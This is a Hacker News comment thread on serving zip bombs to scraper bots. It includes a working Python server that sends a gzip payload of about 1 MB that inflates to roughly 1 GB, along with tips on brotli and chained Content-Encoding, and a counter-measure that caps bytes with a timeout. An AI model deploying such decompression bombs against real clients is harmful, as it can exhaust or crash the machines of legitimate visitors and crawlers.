s0meON3 15 hours ago
What about using zip bombs? https://idiallo.com/blog/zipbomb-protection
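The linked post's idea, as I understand it, is to pre-compress a large payload once and hand it to suspected bots with a gzip Content-Encoding header, letting the client do the inflating. A minimal sketch of that, using only Python's standard library (my own illustration, not the article's code; the 1 GB size, the listen address, and the serve-everything handler are placeholder choices):

    import gzip
    import io
    from http.server import BaseHTTPRequestHandler, HTTPServer

    # Build a gzip stream that inflates to ~1 GB of zeros but is ~1 MB on the wire.
    buf = io.BytesIO()
    with gzip.GzipFile(fileobj=buf, mode="wb", compresslevel=9) as gz:
        for _ in range(1024):                  # 1024 x 1 MB = 1 GB uncompressed
            gz.write(b"\0" * (1024 * 1024))
    BOMB = buf.getvalue()

    class BombHandler(BaseHTTPRequestHandler):
        # Serves the pre-compressed payload to every GET; a real setup would only
        # do this for clients already identified as abusive (placeholder logic).
        def do_GET(self):
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.send_header("Content-Encoding", "gzip")   # the client inflates, not us
            self.send_header("Content-Length", str(len(BOMB)))
            self.end_headers()
            self.wfile.write(BOMB)             # sent as-is, ~1 MB of traffic

    if __name__ == "__main__":
        HTTPServer(("127.0.0.1", 8080), BombHandler).serve_forever()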
"Gzip only provides a compression ratio of a little over 1000: If I want a file that expands to 100 GB, I’ve got to serve a 100 MB asset. Worse, when I tried it, the bots just shrugged it off, with some even coming back for more."
https://maurycyz.com/misc/the_cost_of_trash/#:~:text=throw%2...
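The quoted ceiling is easy to sanity-check (my own sketch, not from the linked post): compress a buffer of zeros and print the ratio. Deflate, the format underneath gzip, tops out at roughly 1032:1, which is why a 100 GB decompressed payload still costs about 100 MB on the wire.

    import gzip

    raw = b"\0" * (100 * 1024 * 1024)              # 100 MB of zeros
    compressed = gzip.compress(raw, compresslevel=9)
    print(f"{len(raw) / len(compressed):.0f}:1")   # roughly 1030:1, close to deflate's ceiling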
kalkin 26 minutes ago
Ah, cool, that site's robots.txt is still broken, just like it was when it first came up on HN...
LunaSea 13 hours ago
You could try different compression methods supported by browsers, like brotli.
Otherwise you can also chain compression methods, e.g. "Content-Encoding: gzip, gzip".
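A rough way to compare those options (my own sketch; the 100 MB zero-filled payload is arbitrary, and brotli needs the third-party brotli package). Per the HTTP spec, Content-Encoding is a comma-separated list applied left to right, so a client seeing "gzip, gzip" is expected to run two gunzip passes:

    import gzip

    payload = b"\0" * (100 * 1024 * 1024)            # 100 MB of zeros

    once = gzip.compress(payload, compresslevel=9)
    twice = gzip.compress(once, compresslevel=9)     # what "Content-Encoding: gzip, gzip" would carry
    print("gzip:      ", len(once))
    print("gzip, gzip:", len(twice))                 # the gzip stream of zeros is itself repetitive, so it shrinks again

    try:
        import brotli                                # third-party: pip install Brotli
        print("br:        ", len(brotli.compress(payload, quality=11)))
    except ImportError:
        print("brotli module not installed")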
renegat0x0 14 hours ago
Even I, who does not know much, implemented a workaround.
I have a web crawler with both a scraping byte limit and a timeout, so zip bombs don't bother me much (a sketch of that kind of guard follows this comment).
https://github.com/rumca-js/crawler-buddy
I think garbage blabber would be more effective.
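For reference, a byte cap plus timeout of the kind described above can be quite small (my own sketch using the requests library, not code from crawler-buddy; the 5 MB and 10-second limits are made up). The useful detail is streaming the body and counting decoded bytes, so a response that inflates past the cap is abandoned partway through:

    import requests

    MAX_BYTES = 5 * 1024 * 1024     # give up after 5 MB of decoded body (placeholder limit)
    TIMEOUT = 10                    # seconds for connect/read (placeholder limit)

    def fetch_capped(url: str) -> bytes | None:
        """Fetch a page, but bail out if it takes too long or decompresses too large."""
        body = bytearray()
        with requests.get(url, stream=True, timeout=TIMEOUT) as resp:
            for chunk in resp.iter_content(chunk_size=64 * 1024):  # chunks arrive already gunzipped
                body.extend(chunk)
                if len(body) > MAX_BYTES:
                    return None     # zip bomb or just oversized: abandon the fetch
        return bytes(body)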